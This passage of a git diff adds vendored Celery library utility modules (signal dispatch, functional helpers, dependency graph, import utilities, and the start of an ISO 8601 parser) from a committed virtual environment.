fget.__name__, fget.__module__, fget.__doc__, + ) + self.depreinfo = depreinfo + self.depreinfo.setdefault('stacklevel', 3) + + def __get__(self, obj, type=None): + if obj is None: + return self + warn(**self.depreinfo) + return self.__get(obj) + + def __set__(self, obj, value): + if obj is None: + return self + if self.__set is None: + raise AttributeError('cannot set attribute') + warn(**self.depreinfo) + self.__set(obj, value) + + def __delete__(self, obj): + if obj is None: + return self + if self.__del is None: + raise AttributeError('cannot delete attribute') + warn(**self.depreinfo) + self.__del(obj) + + def setter(self, fset): + return self.__class__(self.__get, fset, self.__del, **self.depreinfo) + + def deleter(self, fdel): + return self.__class__(self.__get, self.__set, fdel, **self.depreinfo) diff --git a/env/Lib/site-packages/celery/utils/dispatch/__init__.py b/env/Lib/site-packages/celery/utils/dispatch/__init__.py new file mode 100644 index 00000000..b9329a7e --- /dev/null +++ b/env/Lib/site-packages/celery/utils/dispatch/__init__.py @@ -0,0 +1,4 @@ +"""Observer pattern.""" +from .signal import Signal + +__all__ = ('Signal',) diff --git a/env/Lib/site-packages/celery/utils/dispatch/signal.py b/env/Lib/site-packages/celery/utils/dispatch/signal.py new file mode 100644 index 00000000..0cfa6127 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/dispatch/signal.py @@ -0,0 +1,354 @@ +"""Implementation of the Observer pattern.""" +import sys +import threading +import warnings +import weakref +from weakref import WeakMethod + +from kombu.utils.functional import retry_over_time + +from celery.exceptions import CDeprecationWarning +from celery.local import PromiseProxy, Proxy +from celery.utils.functional import fun_accepts_kwargs +from celery.utils.log import get_logger +from celery.utils.time import humanize_seconds + +__all__ = ('Signal',) + +logger = get_logger(__name__) + + +def _make_id(target): # pragma: no cover + if isinstance(target, Proxy): + target = target._get_current_object() + if isinstance(target, (bytes, str)): + # see Issue #2475 + return target + if hasattr(target, '__func__'): + return id(target.__func__) + return id(target) + + +def _boundmethod_safe_weakref(obj): + """Get weakref constructor appropriate for `obj`. `obj` may be a bound method. + + Bound method objects must be special-cased because they're usually garbage + collected immediately, even if the instance they're bound to persists. + + Returns: + a (weakref constructor, main object) tuple. `weakref constructor` is + either :class:`weakref.ref` or :class:`weakref.WeakMethod`. `main + object` is the instance that `obj` is bound to if it is a bound method; + otherwise `main object` is simply `obj. + """ + try: + obj.__func__ + obj.__self__ + # Bound method + return WeakMethod, obj.__self__ + except AttributeError: + # Not a bound method + return weakref.ref, obj + + +def _make_lookup_key(receiver, sender, dispatch_uid): + if dispatch_uid: + return (dispatch_uid, _make_id(sender)) + else: + return (_make_id(receiver), _make_id(sender)) + + +NONE_ID = _make_id(None) + +NO_RECEIVERS = object() + +RECEIVER_RETRY_ERROR = """\ +Could not process signal receiver %(receiver)s. Retrying %(when)s...\ +""" + + +class Signal: # pragma: no cover + """Create new signal. + + Keyword Arguments: + providing_args (List): A list of the arguments this signal can pass + along in a :meth:`send` call. + use_caching (bool): Enable receiver cache. + name (str): Name of signal, used for debugging purposes. + """ + + #: Holds a dictionary of + #: ``{receiverkey (id): weakref(receiver)}`` mappings. + receivers = None + + def __init__(self, providing_args=None, use_caching=False, name=None): + self.receivers = [] + self.providing_args = set( + providing_args if providing_args is not None else []) + self.lock = threading.Lock() + self.use_caching = use_caching + self.name = name + # For convenience we create empty caches even if they are not used. + # A note about caching: if use_caching is defined, then for each + # distinct sender we cache the receivers that sender has in + # 'sender_receivers_cache'. The cache is cleaned when .connect() or + # .disconnect() is called and populated on .send(). + self.sender_receivers_cache = ( + weakref.WeakKeyDictionary() if use_caching else {} + ) + self._dead_receivers = False + + def _connect_proxy(self, fun, sender, weak, dispatch_uid): + return self.connect( + fun, sender=sender._get_current_object(), + weak=weak, dispatch_uid=dispatch_uid, + ) + + def connect(self, *args, **kwargs): + """Connect receiver to sender for signal. + + Arguments: + receiver (Callable): A function or an instance method which is to + receive signals. Receivers must be hashable objects. + + if weak is :const:`True`, then receiver must be + weak-referenceable. + + Receivers must be able to accept keyword arguments. + + If receivers have a `dispatch_uid` attribute, the receiver will + not be added if another receiver already exists with that + `dispatch_uid`. + + sender (Any): The sender to which the receiver should respond. + Must either be a Python object, or :const:`None` to + receive events from any sender. + + weak (bool): Whether to use weak references to the receiver. + By default, the module will attempt to use weak references to + the receiver objects. If this parameter is false, then strong + references will be used. + + dispatch_uid (Hashable): An identifier used to uniquely identify a + particular instance of a receiver. This will usually be a + string, though it may be anything hashable. + + retry (bool): If the signal receiver raises an exception + (e.g. ConnectionError), the receiver will be retried until it + runs successfully. A strong ref to the receiver will be stored + and the `weak` option will be ignored. + """ + def _handle_options(sender=None, weak=True, dispatch_uid=None, + retry=False): + + def _connect_signal(fun): + + options = {'dispatch_uid': dispatch_uid, + 'weak': weak} + + def _retry_receiver(retry_fun): + + def _try_receiver_over_time(*args, **kwargs): + def on_error(exc, intervals, retries): + interval = next(intervals) + err_msg = RECEIVER_RETRY_ERROR % \ + {'receiver': retry_fun, + 'when': humanize_seconds(interval, 'in', ' ')} + logger.error(err_msg) + return interval + + return retry_over_time(retry_fun, Exception, args, + kwargs, on_error) + + return _try_receiver_over_time + + if retry: + options['weak'] = False + if not dispatch_uid: + # if there's no dispatch_uid then we need to set the + # dispatch uid to the original func id so we can look + # it up later with the original func id + options['dispatch_uid'] = _make_id(fun) + fun = _retry_receiver(fun) + + self._connect_signal(fun, sender, options['weak'], + options['dispatch_uid']) + return fun + + return _connect_signal + + if args and callable(args[0]): + return _handle_options(*args[1:], **kwargs)(args[0]) + return _handle_options(*args, **kwargs) + + def _connect_signal(self, receiver, sender, weak, dispatch_uid): + assert callable(receiver), 'Signal receivers must be callable' + if not fun_accepts_kwargs(receiver): + raise ValueError( + 'Signal receiver must accept keyword arguments.') + + if isinstance(sender, PromiseProxy): + sender.__then__( + self._connect_proxy, receiver, sender, weak, dispatch_uid, + ) + return receiver + + lookup_key = _make_lookup_key(receiver, sender, dispatch_uid) + + if weak: + ref, receiver_object = _boundmethod_safe_weakref(receiver) + receiver = ref(receiver) + weakref.finalize(receiver_object, self._remove_receiver) + + with self.lock: + self._clear_dead_receivers() + for r_key, _ in self.receivers: + if r_key == lookup_key: + break + else: + self.receivers.append((lookup_key, receiver)) + self.sender_receivers_cache.clear() + + return receiver + + def disconnect(self, receiver=None, sender=None, weak=None, + dispatch_uid=None): + """Disconnect receiver from sender for signal. + + If weak references are used, disconnect needn't be called. + The receiver will be removed from dispatch automatically. + + Arguments: + receiver (Callable): The registered receiver to disconnect. + May be none if `dispatch_uid` is specified. + + sender (Any): The registered sender to disconnect. + + weak (bool): The weakref state to disconnect. + + dispatch_uid (Hashable): The unique identifier of the receiver + to disconnect. + """ + if weak is not None: + warnings.warn( + 'Passing `weak` to disconnect has no effect.', + CDeprecationWarning, stacklevel=2) + + lookup_key = _make_lookup_key(receiver, sender, dispatch_uid) + + disconnected = False + with self.lock: + self._clear_dead_receivers() + for index in range(len(self.receivers)): + (r_key, _) = self.receivers[index] + if r_key == lookup_key: + disconnected = True + del self.receivers[index] + break + self.sender_receivers_cache.clear() + return disconnected + + def has_listeners(self, sender=None): + return bool(self._live_receivers(sender)) + + def send(self, sender, **named): + """Send signal from sender to all connected receivers. + + If any receiver raises an error, the exception is returned as the + corresponding response. (This is different from the "send" in + Django signals. In Celery "send" and "send_robust" do the same thing.) + + Arguments: + sender (Any): The sender of the signal. + Either a specific object or :const:`None`. + **named (Any): Named arguments which will be passed to receivers. + + Returns: + List: of tuple pairs: `[(receiver, response), … ]`. + """ + responses = [] + if not self.receivers or \ + self.sender_receivers_cache.get(sender) is NO_RECEIVERS: + return responses + + for receiver in self._live_receivers(sender): + try: + response = receiver(signal=self, sender=sender, **named) + except Exception as exc: # pylint: disable=broad-except + if not hasattr(exc, '__traceback__'): + exc.__traceback__ = sys.exc_info()[2] + logger.exception( + 'Signal handler %r raised: %r', receiver, exc) + responses.append((receiver, exc)) + else: + responses.append((receiver, response)) + return responses + send_robust = send # Compat with Django interface. + + def _clear_dead_receivers(self): + # Warning: caller is assumed to hold self.lock + if self._dead_receivers: + self._dead_receivers = False + new_receivers = [] + for r in self.receivers: + if isinstance(r[1], weakref.ReferenceType) and r[1]() is None: + continue + new_receivers.append(r) + self.receivers = new_receivers + + def _live_receivers(self, sender): + """Filter sequence of receivers to get resolved, live receivers. + + This checks for weak references and resolves them, then returning only + live receivers. + """ + receivers = None + if self.use_caching and not self._dead_receivers: + receivers = self.sender_receivers_cache.get(sender) + # We could end up here with NO_RECEIVERS even if we do check this + # case in .send() prior to calling _Live_receivers() due to + # concurrent .send() call. + if receivers is NO_RECEIVERS: + return [] + if receivers is None: + with self.lock: + self._clear_dead_receivers() + senderkey = _make_id(sender) + receivers = [] + for (receiverkey, r_senderkey), receiver in self.receivers: + if r_senderkey == NONE_ID or r_senderkey == senderkey: + receivers.append(receiver) + if self.use_caching: + if not receivers: + self.sender_receivers_cache[sender] = NO_RECEIVERS + else: + # Note: we must cache the weakref versions. + self.sender_receivers_cache[sender] = receivers + non_weak_receivers = [] + for receiver in receivers: + if isinstance(receiver, weakref.ReferenceType): + # Dereference the weak reference. + receiver = receiver() + if receiver is not None: + non_weak_receivers.append(receiver) + else: + non_weak_receivers.append(receiver) + return non_weak_receivers + + def _remove_receiver(self, receiver=None): + """Remove dead receivers from connections.""" + # Mark that the self..receivers first has dead weakrefs. If so, + # we will clean those up in connect, disconnect and _live_receivers + # while holding self.lock. Note that doing the cleanup here isn't a + # good idea, _remove_receiver() will be called as a side effect of + # garbage collection, and so the call can happen wh ile we are already + # holding self.lock. + self._dead_receivers = True + + def __repr__(self): + """``repr(signal)``.""" + return f'<{type(self).__name__}: {self.name} providing_args={self.providing_args!r}>' + + def __str__(self): + """``str(signal)``.""" + return repr(self) diff --git a/env/Lib/site-packages/celery/utils/functional.py b/env/Lib/site-packages/celery/utils/functional.py new file mode 100644 index 00000000..5fb0d633 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/functional.py @@ -0,0 +1,402 @@ +"""Functional-style utilities.""" +import inspect +from collections import UserList +from functools import partial +from itertools import islice, tee, zip_longest +from typing import Any, Callable + +from kombu.utils.functional import LRUCache, dictfilter, is_list, lazy, maybe_evaluate, maybe_list, memoize +from vine import promise + +from celery.utils.log import get_logger + +logger = get_logger(__name__) + +__all__ = ( + 'LRUCache', 'is_list', 'maybe_list', 'memoize', 'mlazy', 'noop', + 'first', 'firstmethod', 'chunks', 'padlist', 'mattrgetter', 'uniq', + 'regen', 'dictfilter', 'lazy', 'maybe_evaluate', 'head_from_fun', + 'maybe', 'fun_accepts_kwargs', +) + +FUNHEAD_TEMPLATE = """ +def {fun_name}({fun_args}): + return {fun_value} +""" + + +class DummyContext: + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + pass + + +class mlazy(lazy): + """Memoized lazy evaluation. + + The function is only evaluated once, every subsequent access + will return the same value. + """ + + #: Set to :const:`True` after the object has been evaluated. + evaluated = False + _value = None + + def evaluate(self): + if not self.evaluated: + self._value = super().evaluate() + self.evaluated = True + return self._value + + +def noop(*args, **kwargs): + """No operation. + + Takes any arguments/keyword arguments and does nothing. + """ + + +def pass1(arg, *args, **kwargs): + """Return the first positional argument.""" + return arg + + +def evaluate_promises(it): + for value in it: + if isinstance(value, promise): + value = value() + yield value + + +def first(predicate, it): + """Return the first element in ``it`` that ``predicate`` accepts. + + If ``predicate`` is None it will return the first item that's not + :const:`None`. + """ + return next( + (v for v in evaluate_promises(it) if ( + predicate(v) if predicate is not None else v is not None)), + None, + ) + + +def firstmethod(method, on_call=None): + """Multiple dispatch. + + Return a function that with a list of instances, + finds the first instance that gives a value for the given method. + + The list can also contain lazy instances + (:class:`~kombu.utils.functional.lazy`.) + """ + + def _matcher(it, *args, **kwargs): + for obj in it: + try: + meth = getattr(maybe_evaluate(obj), method) + reply = (on_call(meth, *args, **kwargs) if on_call + else meth(*args, **kwargs)) + except AttributeError: + pass + else: + if reply is not None: + return reply + + return _matcher + + +def chunks(it, n): + """Split an iterator into chunks with `n` elements each. + + Warning: + ``it`` must be an actual iterator, if you pass this a + concrete sequence will get you repeating elements. + + So ``chunks(iter(range(1000)), 10)`` is fine, but + ``chunks(range(1000), 10)`` is not. + + Example: + # n == 2 + >>> x = chunks(iter([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]), 2) + >>> list(x) + [[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10]] + + # n == 3 + >>> x = chunks(iter([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]), 3) + >>> list(x) + [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 10]] + """ + for item in it: + yield [item] + list(islice(it, n - 1)) + + +def padlist(container, size, default=None): + """Pad list with default elements. + + Example: + >>> first, last, city = padlist(['George', 'Costanza', 'NYC'], 3) + ('George', 'Costanza', 'NYC') + >>> first, last, city = padlist(['George', 'Costanza'], 3) + ('George', 'Costanza', None) + >>> first, last, city, planet = padlist( + ... ['George', 'Costanza', 'NYC'], 4, default='Earth', + ... ) + ('George', 'Costanza', 'NYC', 'Earth') + """ + return list(container)[:size] + [default] * (size - len(container)) + + +def mattrgetter(*attrs): + """Get attributes, ignoring attribute errors. + + Like :func:`operator.itemgetter` but return :const:`None` on missing + attributes instead of raising :exc:`AttributeError`. + """ + return lambda obj: {attr: getattr(obj, attr, None) for attr in attrs} + + +def uniq(it): + """Return all unique elements in ``it``, preserving order.""" + seen = set() + return (seen.add(obj) or obj for obj in it if obj not in seen) + + +def lookahead(it): + """Yield pairs of (current, next) items in `it`. + + `next` is None if `current` is the last item. + Example: + >>> list(lookahead(x for x in range(6))) + [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5), (5, None)] + """ + a, b = tee(it) + next(b, None) + return zip_longest(a, b) + + +def regen(it): + """Convert iterator to an object that can be consumed multiple times. + + ``Regen`` takes any iterable, and if the object is an + generator it will cache the evaluated list on first access, + so that the generator can be "consumed" multiple times. + """ + if isinstance(it, (list, tuple)): + return it + return _regen(it) + + +class _regen(UserList, list): + # must be subclass of list so that json can encode. + + def __init__(self, it): + # pylint: disable=super-init-not-called + # UserList creates a new list and sets .data, so we don't + # want to call init here. + self.__it = it + self.__consumed = [] + self.__done = False + + def __reduce__(self): + return list, (self.data,) + + def map(self, func): + self.__consumed = [func(el) for el in self.__consumed] + self.__it = map(func, self.__it) + + def __length_hint__(self): + return self.__it.__length_hint__() + + def __lookahead_consume(self, limit=None): + if not self.__done and (limit is None or limit > 0): + it = iter(self.__it) + try: + now = next(it) + except StopIteration: + return + self.__consumed.append(now) + # Maintain a single look-ahead to ensure we set `__done` when the + # underlying iterator gets exhausted + while not self.__done: + try: + next_ = next(it) + self.__consumed.append(next_) + except StopIteration: + self.__done = True + break + finally: + yield now + now = next_ + # We can break out when `limit` is exhausted + if limit is not None: + limit -= 1 + if limit <= 0: + break + + def __iter__(self): + yield from self.__consumed + yield from self.__lookahead_consume() + + def __getitem__(self, index): + if index < 0: + return self.data[index] + # Consume elements up to the desired index prior to attempting to + # access it from within `__consumed` + consume_count = index - len(self.__consumed) + 1 + for _ in self.__lookahead_consume(limit=consume_count): + pass + return self.__consumed[index] + + def __bool__(self): + if len(self.__consumed): + return True + + try: + next(iter(self)) + except StopIteration: + return False + else: + return True + + @property + def data(self): + if not self.__done: + self.__consumed.extend(self.__it) + self.__done = True + return self.__consumed + + def __repr__(self): + return "<{}: [{}{}]>".format( + self.__class__.__name__, + ", ".join(repr(e) for e in self.__consumed), + "..." if not self.__done else "", + ) + + +def _argsfromspec(spec, replace_defaults=True): + if spec.defaults: + split = len(spec.defaults) + defaults = (list(range(len(spec.defaults))) if replace_defaults + else spec.defaults) + positional = spec.args[:-split] + optional = list(zip(spec.args[-split:], defaults)) + else: + positional, optional = spec.args, [] + + varargs = spec.varargs + varkw = spec.varkw + if spec.kwonlydefaults: + kwonlyargs = set(spec.kwonlyargs) - set(spec.kwonlydefaults.keys()) + if replace_defaults: + kwonlyargs_optional = [ + (kw, i) for i, kw in enumerate(spec.kwonlydefaults.keys()) + ] + else: + kwonlyargs_optional = list(spec.kwonlydefaults.items()) + else: + kwonlyargs, kwonlyargs_optional = spec.kwonlyargs, [] + + return ', '.join(filter(None, [ + ', '.join(positional), + ', '.join(f'{k}={v}' for k, v in optional), + f'*{varargs}' if varargs else None, + '*' if (kwonlyargs or kwonlyargs_optional) and not varargs else None, + ', '.join(kwonlyargs) if kwonlyargs else None, + ', '.join(f'{k}="{v}"' for k, v in kwonlyargs_optional), + f'**{varkw}' if varkw else None, + ])) + + +def head_from_fun(fun: Callable[..., Any], bound: bool = False) -> str: + """Generate signature function from actual function.""" + # we could use inspect.Signature here, but that implementation + # is very slow since it implements the argument checking + # in pure-Python. Instead we use exec to create a new function + # with an empty body, meaning it has the same performance as + # as just calling a function. + is_function = inspect.isfunction(fun) + is_callable = callable(fun) + is_cython = fun.__class__.__name__ == 'cython_function_or_method' + is_method = inspect.ismethod(fun) + + if not is_function and is_callable and not is_method and not is_cython: + name, fun = fun.__class__.__name__, fun.__call__ + else: + name = fun.__name__ + definition = FUNHEAD_TEMPLATE.format( + fun_name=name, + fun_args=_argsfromspec(inspect.getfullargspec(fun)), + fun_value=1, + ) + logger.debug(definition) + namespace = {'__name__': fun.__module__} + # pylint: disable=exec-used + # Tasks are rarely, if ever, created at runtime - exec here is fine. + exec(definition, namespace) + result = namespace[name] + result._source = definition + if bound: + return partial(result, object()) + return result + + +def arity_greater(fun, n): + argspec = inspect.getfullargspec(fun) + return argspec.varargs or len(argspec.args) > n + + +def fun_takes_argument(name, fun, position=None): + spec = inspect.getfullargspec(fun) + return ( + spec.varkw or spec.varargs or + (len(spec.args) >= position if position else name in spec.args) + ) + + +def fun_accepts_kwargs(fun): + """Return true if function accepts arbitrary keyword arguments.""" + return any( + p for p in inspect.signature(fun).parameters.values() + if p.kind == p.VAR_KEYWORD + ) + + +def maybe(typ, val): + """Call typ on value if val is defined.""" + return typ(val) if val is not None else val + + +def seq_concat_item(seq, item): + """Return copy of sequence seq with item added. + + Returns: + Sequence: if seq is a tuple, the result will be a tuple, + otherwise it depends on the implementation of ``__add__``. + """ + return seq + (item,) if isinstance(seq, tuple) else seq + [item] + + +def seq_concat_seq(a, b): + """Concatenate two sequences: ``a + b``. + + Returns: + Sequence: The return value will depend on the largest sequence + - if b is larger and is a tuple, the return value will be a tuple. + - if a is larger and is a list, the return value will be a list, + """ + # find the type of the largest sequence + prefer = type(max([a, b], key=len)) + # convert the smallest list to the type of the largest sequence. + if not isinstance(a, prefer): + a = prefer(a) + if not isinstance(b, prefer): + b = prefer(b) + return a + b + + +def is_numeric_value(value): + return isinstance(value, (int, float)) and not isinstance(value, bool) diff --git a/env/Lib/site-packages/celery/utils/graph.py b/env/Lib/site-packages/celery/utils/graph.py new file mode 100644 index 00000000..c1b0b55b --- /dev/null +++ b/env/Lib/site-packages/celery/utils/graph.py @@ -0,0 +1,309 @@ +"""Dependency graph implementation.""" +from collections import Counter +from textwrap import dedent + +from kombu.utils.encoding import bytes_to_str, safe_str + +__all__ = ('DOT', 'CycleError', 'DependencyGraph', 'GraphFormatter') + + +class DOT: + """Constants related to the dot format.""" + + HEAD = dedent(""" + {IN}{type} {id} {{ + {INp}graph [{attrs}] + """) + ATTR = '{name}={value}' + NODE = '{INp}"{0}" [{attrs}]' + EDGE = '{INp}"{0}" {dir} "{1}" [{attrs}]' + ATTRSEP = ', ' + DIRS = {'graph': '--', 'digraph': '->'} + TAIL = '{IN}}}' + + +class CycleError(Exception): + """A cycle was detected in an acyclic graph.""" + + +class DependencyGraph: + """A directed acyclic graph of objects and their dependencies. + + Supports a robust topological sort + to detect the order in which they must be handled. + + Takes an optional iterator of ``(obj, dependencies)`` + tuples to build the graph from. + + Warning: + Does not support cycle detection. + """ + + def __init__(self, it=None, formatter=None): + self.formatter = formatter or GraphFormatter() + self.adjacent = {} + if it is not None: + self.update(it) + + def add_arc(self, obj): + """Add an object to the graph.""" + self.adjacent.setdefault(obj, []) + + def add_edge(self, A, B): + """Add an edge from object ``A`` to object ``B``. + + I.e. ``A`` depends on ``B``. + """ + self[A].append(B) + + def connect(self, graph): + """Add nodes from another graph.""" + self.adjacent.update(graph.adjacent) + + def topsort(self): + """Sort the graph topologically. + + Returns: + List: of objects in the order in which they must be handled. + """ + graph = DependencyGraph() + components = self._tarjan72() + + NC = { + node: component for component in components for node in component + } + for component in components: + graph.add_arc(component) + for node in self: + node_c = NC[node] + for successor in self[node]: + successor_c = NC[successor] + if node_c != successor_c: + graph.add_edge(node_c, successor_c) + return [t[0] for t in graph._khan62()] + + def valency_of(self, obj): + """Return the valency (degree) of a vertex in the graph.""" + try: + l = [len(self[obj])] + except KeyError: + return 0 + for node in self[obj]: + l.append(self.valency_of(node)) + return sum(l) + + def update(self, it): + """Update graph with data from a list of ``(obj, deps)`` tuples.""" + tups = list(it) + for obj, _ in tups: + self.add_arc(obj) + for obj, deps in tups: + for dep in deps: + self.add_edge(obj, dep) + + def edges(self): + """Return generator that yields for all edges in the graph.""" + return (obj for obj, adj in self.items() if adj) + + def _khan62(self): + """Perform Khan's simple topological sort algorithm from '62. + + See https://en.wikipedia.org/wiki/Topological_sorting + """ + count = Counter() + result = [] + + for node in self: + for successor in self[node]: + count[successor] += 1 + ready = [node for node in self if not count[node]] + + while ready: + node = ready.pop() + result.append(node) + + for successor in self[node]: + count[successor] -= 1 + if count[successor] == 0: + ready.append(successor) + result.reverse() + return result + + def _tarjan72(self): + """Perform Tarjan's algorithm to find strongly connected components. + + See Also: + :wikipedia:`Tarjan%27s_strongly_connected_components_algorithm` + """ + result, stack, low = [], [], {} + + def visit(node): + if node in low: + return + num = len(low) + low[node] = num + stack_pos = len(stack) + stack.append(node) + + for successor in self[node]: + visit(successor) + low[node] = min(low[node], low[successor]) + + if num == low[node]: + component = tuple(stack[stack_pos:]) + stack[stack_pos:] = [] + result.append(component) + for item in component: + low[item] = len(self) + + for node in self: + visit(node) + + return result + + def to_dot(self, fh, formatter=None): + """Convert the graph to DOT format. + + Arguments: + fh (IO): A file, or a file-like object to write the graph to. + formatter (celery.utils.graph.GraphFormatter): Custom graph + formatter to use. + """ + seen = set() + draw = formatter or self.formatter + + def P(s): + print(bytes_to_str(s), file=fh) + + def if_not_seen(fun, obj): + if draw.label(obj) not in seen: + P(fun(obj)) + seen.add(draw.label(obj)) + + P(draw.head()) + for obj, adjacent in self.items(): + if not adjacent: + if_not_seen(draw.terminal_node, obj) + for req in adjacent: + if_not_seen(draw.node, obj) + P(draw.edge(obj, req)) + P(draw.tail()) + + def format(self, obj): + return self.formatter(obj) if self.formatter else obj + + def __iter__(self): + return iter(self.adjacent) + + def __getitem__(self, node): + return self.adjacent[node] + + def __len__(self): + return len(self.adjacent) + + def __contains__(self, obj): + return obj in self.adjacent + + def _iterate_items(self): + return self.adjacent.items() + items = iteritems = _iterate_items + + def __repr__(self): + return '\n'.join(self.repr_node(N) for N in self) + + def repr_node(self, obj, level=1, fmt='{0}({1})'): + output = [fmt.format(obj, self.valency_of(obj))] + if obj in self: + for other in self[obj]: + d = fmt.format(other, self.valency_of(other)) + output.append(' ' * level + d) + output.extend(self.repr_node(other, level + 1).split('\n')[1:]) + return '\n'.join(output) + + +class GraphFormatter: + """Format dependency graphs.""" + + _attr = DOT.ATTR.strip() + _node = DOT.NODE.strip() + _edge = DOT.EDGE.strip() + _head = DOT.HEAD.strip() + _tail = DOT.TAIL.strip() + _attrsep = DOT.ATTRSEP + _dirs = dict(DOT.DIRS) + + scheme = { + 'shape': 'box', + 'arrowhead': 'vee', + 'style': 'filled', + 'fontname': 'HelveticaNeue', + } + edge_scheme = { + 'color': 'darkseagreen4', + 'arrowcolor': 'black', + 'arrowsize': 0.7, + } + node_scheme = {'fillcolor': 'palegreen3', 'color': 'palegreen4'} + term_scheme = {'fillcolor': 'palegreen1', 'color': 'palegreen2'} + graph_scheme = {'bgcolor': 'mintcream'} + + def __init__(self, root=None, type=None, id=None, + indent=0, inw=' ' * 4, **scheme): + self.id = id or 'dependencies' + self.root = root + self.type = type or 'digraph' + self.direction = self._dirs[self.type] + self.IN = inw * (indent or 0) + self.INp = self.IN + inw + self.scheme = dict(self.scheme, **scheme) + self.graph_scheme = dict(self.graph_scheme, root=self.label(self.root)) + + def attr(self, name, value): + value = f'"{value}"' + return self.FMT(self._attr, name=name, value=value) + + def attrs(self, d, scheme=None): + d = dict(self.scheme, **dict(scheme, **d or {}) if scheme else d) + return self._attrsep.join( + safe_str(self.attr(k, v)) for k, v in d.items() + ) + + def head(self, **attrs): + return self.FMT( + self._head, id=self.id, type=self.type, + attrs=self.attrs(attrs, self.graph_scheme), + ) + + def tail(self): + return self.FMT(self._tail) + + def label(self, obj): + return obj + + def node(self, obj, **attrs): + return self.draw_node(obj, self.node_scheme, attrs) + + def terminal_node(self, obj, **attrs): + return self.draw_node(obj, self.term_scheme, attrs) + + def edge(self, a, b, **attrs): + return self.draw_edge(a, b, **attrs) + + def _enc(self, s): + return s.encode('utf-8', 'ignore') + + def FMT(self, fmt, *args, **kwargs): + return self._enc(fmt.format( + *args, **dict(kwargs, IN=self.IN, INp=self.INp) + )) + + def draw_edge(self, a, b, scheme=None, attrs=None): + return self.FMT( + self._edge, self.label(a), self.label(b), + dir=self.direction, attrs=self.attrs(attrs, self.edge_scheme), + ) + + def draw_node(self, obj, scheme=None, attrs=None): + return self.FMT( + self._node, self.label(obj), attrs=self.attrs(attrs, scheme), + ) diff --git a/env/Lib/site-packages/celery/utils/imports.py b/env/Lib/site-packages/celery/utils/imports.py new file mode 100644 index 00000000..390b22ce --- /dev/null +++ b/env/Lib/site-packages/celery/utils/imports.py @@ -0,0 +1,163 @@ +"""Utilities related to importing modules and symbols by name.""" +import os +import sys +import warnings +from contextlib import contextmanager +from importlib import import_module, reload + +try: + from importlib.metadata import entry_points +except ImportError: + from importlib_metadata import entry_points + +from kombu.utils.imports import symbol_by_name + +#: Billiard sets this when execv is enabled. +#: We use it to find out the name of the original ``__main__`` +#: module, so that we can properly rewrite the name of the +#: task to be that of ``App.main``. +MP_MAIN_FILE = os.environ.get('MP_MAIN_FILE') + +__all__ = ( + 'NotAPackage', 'qualname', 'instantiate', 'symbol_by_name', + 'cwd_in_path', 'find_module', 'import_from_cwd', + 'reload_from_cwd', 'module_file', 'gen_task_name', +) + + +class NotAPackage(Exception): + """Raised when importing a package, but it's not a package.""" + + +def qualname(obj): + """Return object name.""" + if not hasattr(obj, '__name__') and hasattr(obj, '__class__'): + obj = obj.__class__ + q = getattr(obj, '__qualname__', None) + if '.' not in q: + q = '.'.join((obj.__module__, q)) + return q + + +def instantiate(name, *args, **kwargs): + """Instantiate class by name. + + See Also: + :func:`symbol_by_name`. + """ + return symbol_by_name(name)(*args, **kwargs) + + +@contextmanager +def cwd_in_path(): + """Context adding the current working directory to sys.path.""" + cwd = os.getcwd() + if cwd in sys.path: + yield + else: + sys.path.insert(0, cwd) + try: + yield cwd + finally: + try: + sys.path.remove(cwd) + except ValueError: # pragma: no cover + pass + + +def find_module(module, path=None, imp=None): + """Version of :func:`imp.find_module` supporting dots.""" + if imp is None: + imp = import_module + with cwd_in_path(): + try: + return imp(module) + except ImportError: + # Raise a more specific error if the problem is that one of the + # dot-separated segments of the module name is not a package. + if '.' in module: + parts = module.split('.') + for i, part in enumerate(parts[:-1]): + package = '.'.join(parts[:i + 1]) + try: + mpart = imp(package) + except ImportError: + # Break out and re-raise the original ImportError + # instead. + break + try: + mpart.__path__ + except AttributeError: + raise NotAPackage(package) + raise + + +def import_from_cwd(module, imp=None, package=None): + """Import module, temporarily including modules in the current directory. + + Modules located in the current directory has + precedence over modules located in `sys.path`. + """ + if imp is None: + imp = import_module + with cwd_in_path(): + return imp(module, package=package) + + +def reload_from_cwd(module, reloader=None): + """Reload module (ensuring that CWD is in sys.path).""" + if reloader is None: + reloader = reload + with cwd_in_path(): + return reloader(module) + + +def module_file(module): + """Return the correct original file name of a module.""" + name = module.__file__ + return name[:-1] if name.endswith('.pyc') else name + + +def gen_task_name(app, name, module_name): + """Generate task name from name/module pair.""" + module_name = module_name or '__main__' + try: + module = sys.modules[module_name] + except KeyError: + # Fix for manage.py shell_plus (Issue #366) + module = None + + if module is not None: + module_name = module.__name__ + # - If the task module is used as the __main__ script + # - we need to rewrite the module part of the task name + # - to match App.main. + if MP_MAIN_FILE and module.__file__ == MP_MAIN_FILE: + # - see comment about :envvar:`MP_MAIN_FILE` above. + module_name = '__main__' + if module_name == '__main__' and app.main: + return '.'.join([app.main, name]) + return '.'.join(p for p in (module_name, name) if p) + + +def load_extension_class_names(namespace): + if sys.version_info >= (3, 10): + _entry_points = entry_points(group=namespace) + else: + try: + _entry_points = entry_points().get(namespace, []) + except AttributeError: + _entry_points = entry_points().select(group=namespace) + for ep in _entry_points: + yield ep.name, ep.value + + +def load_extension_classes(namespace): + for name, class_name in load_extension_class_names(namespace): + try: + cls = symbol_by_name(class_name) + except (ImportError, SyntaxError) as exc: + warnings.warn( + f'Cannot load {namespace} extension {class_name!r}: {exc!r}') + else: + yield name, cls diff --git a/env/Lib/site-packages/celery/utils/iso8601.py b/env/Lib/site-packages/celery/utils/iso8601.py new file mode 100644 index 00000000..ffe342b4 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/iso8601.py @@ -0,0 +1,76 @@ +"""Parse ISO8601 dates. + +Originally taken from :pypi:`pyiso8601` +(https://bitbucket.org/micktwomey/pyiso8601) + +Modified to match the behavior of ``dateutil.parser``: + + - raise :exc:`ValueError` instead of ``ParseError`` + - return naive :class:`~datetime.datetime` by default + +This is the original License: + +Copyright (c) 2007 Michael Twomey + +Permission is hereby granted, free of charge, to any person obtaining a +copy of this software and associated documentation files (the +"Software"), to deal in the Software 